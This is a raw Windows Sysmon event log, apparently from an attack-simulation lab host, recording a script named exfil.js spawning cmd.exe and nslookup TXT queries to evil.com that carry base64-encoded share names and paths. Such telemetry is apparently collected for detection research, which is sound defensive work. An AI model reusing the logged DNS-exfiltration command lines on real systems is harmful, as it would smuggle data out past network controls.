14:21:39.648{2E1864BB-18F3-629A-BC44-000000005F02}60126996C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-BE44-000000005F02}5000C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.655{2E1864BB-18F3-629A-BE44-000000005F02}5000C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-BC44-000000005F02}6012C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlayrgwnd.tmp 2>&1 10341000x8000000000000000211683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.633{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-BD44-000000005F02}1008C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.633{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-BD44-000000005F02}1008C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.633{2E1864BB-18F3-629A-BD44-000000005F02}10087744C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-BC44-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.617{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-BD44-000000005F02}1008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.617{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.617{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.617{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.617{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.601{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-BC44-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.601{2E1864BB-18E0-629A-6742-000000005F02}39761736C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-BC44-000000005F02}6012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.615{2E1864BB-18F3-629A-BC44-000000005F02}6012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlayrgwnd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.601{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkbwgj.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000211671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.601{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0DFED43F043EE47364706A9980D9062,SHA256=B1BC7545E879C9FB0618AE8693556D0B6C12193DDFF5BDA2170F32860339F5AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000211670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.585{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1070508278ACEA987D78B75F7C21C3C,SHA256=FA388BE4EB05F81B4E7E3325996F92870CAD4F5CDC48F97C0B71FDEFDFC3B8F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.585{2E1864BB-18F3-629A-BA44-000000005F02}51766448C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-BB44-000000005F02}5908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.585{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.585{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.585{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.584{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.582{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-BB44-000000005F02}5908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.581{2E1864BB-18F3-629A-B944-000000005F02}3127368C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-BB44-000000005F02}5908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.581{2E1864BB-18F3-629A-BB44-000000005F02}5908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-B944-000000005F02}312C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnkbwgj.tmp 2>&1 10341000x8000000000000000211661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.548{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-BA44-000000005F02}5176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.548{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-BA44-000000005F02}5176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.548{2E1864BB-18F3-629A-BA44-000000005F02}51766448C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-B944-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.532{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-BA44-000000005F02}5176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.516{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.516{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.516{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.516{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.516{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-B944-000000005F02}312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 